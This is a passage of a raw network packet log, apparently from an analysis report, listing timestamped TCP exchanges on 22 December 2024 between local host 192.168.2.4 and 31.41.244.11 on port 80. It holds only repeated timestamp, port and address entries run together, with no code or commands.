                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.618474960 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.618520021 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.619635105 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.619687080 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.619740009 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.619782925 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.620896101 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.620965958 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.621016979 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.621057987 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.622158051 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.622199059 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.622261047 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.622301102 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.623388052 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.623430967 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.623507977 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.623547077 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.624648094 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.624689102 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.624773026 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.624815941 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.625847101 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.625893116 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.625911951 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.625948906 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.627099991 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.627147913 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.627237082 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.627280951 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.628268003 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.628325939 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.628381014 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.628422976 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.629491091 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.629540920 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.630032063 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.630084038 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.630670071 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.630713940 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.630733967 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.630774975 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.631854057 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.631894112 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.631953955 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.631994009 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.633006096 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.633044004 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.633105993 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.633167028 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.634151936 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.634195089 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.634264946 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.634300947 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.635343075 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.635387897 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.635457039 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.635504007 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.636462927 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.636514902 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.636542082 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.636585951 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.637593031 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.637641907 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.637715101 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.637756109 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.638715982 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.638757944 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.638828993 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.638868093 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.639888048 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.639928102 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.640014887 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.640049934 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.640947104 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.640991926 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.641028881 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.641072035 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.642056942 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.642106056 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.642111063 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.642143965 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.643137932 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.643220901 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.643265009 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.643307924 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.644237995 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.644279003 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.644300938 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.644341946 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.645311117 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.645349026 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.645399094 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.645442009 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.646388054 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.646506071 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.646543980 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.646584988 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.647428989 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.647469044 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.647543907 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.647582054 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.648468018 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.648516893 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.648597002 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.648638010 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.649545908 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.649590015 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.649652004 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.649693966 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.650561094 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.650616884 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.650666952 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.650715113 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.651618958 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.651659966 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.651731968 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.651772976 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.652625084 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.652666092 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.652750015 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.652790070 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.653614044 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.653681993 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.653717995 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.653759003 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.654726028 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.654769897 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.654822111 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.654860973 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.655642033 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.655682087 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.655728102 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.655770063 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.656646013 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.656686068 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.656759024 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.656799078 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.657645941 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.657685041 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.657721996 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.657763958 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.658643961 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.658689022 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.658706903 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.658746004 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.659598112 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.659638882 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.659687996 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.659730911 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.660624981 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.660661936 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.660712004 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.660752058 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.661595106 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.661639929 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.662014008 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.662059069 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.662544012 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.662590027 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.662676096 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.662714005 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.663522005 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.663573027 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.663623095 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.663686037 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.664546967 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.664591074 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.664731979 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.664772987 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.665497065 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.665540934 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.665580034 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.665616989 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.666450024 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.666497946 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.666562080 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.666608095 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.667423964 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.667467117 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.667517900 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.667561054 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.668415070 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.668458939 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.668500900 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.668544054 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.669291973 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.669332981 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.669353962 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.669389009 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.670160055 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.670211077 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.670293093 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.670341015 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.671049118 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.671094894 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.671235085 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.671281099 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.671938896 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.671977997 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.672058105 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.672103882 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.672805071 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.672847033 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.672864914 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.672908068 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.673675060 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.673749924 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.673775911 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.673816919 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.674525023 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.674566031 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.674639940 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.674683094 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.675395012 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.675441027 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.675494909 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.675539017 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.676233053 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.676280022 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.676330090 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.676373005 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.677083969 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.677128077 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.677184105 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.677226067 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.677962065 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.678006887 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.678286076 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.678330898 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.678858995 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.678899050 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.678930044 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.678972006 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.679614067 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.679656982 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.679714918 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.679759026 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.680490971 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.680536032 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.680588961 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.680635929 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.681293964 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.681366920 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.681416035 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.681483984 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.682116032 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.682192087 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.682235003 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.682313919 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.682943106 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.683016062 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.683051109 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.683137894 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.683808088 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.683881998 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.683945894 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.684010983 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.684601068 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.684676886 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.684700966 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.684753895 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.685396910 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.685472012 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.685476065 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.685559988 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.686204910 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.686283112 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.686330080 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.686413050 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.687037945 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.687107086 CET4987280192.168.2.431.41.244.11
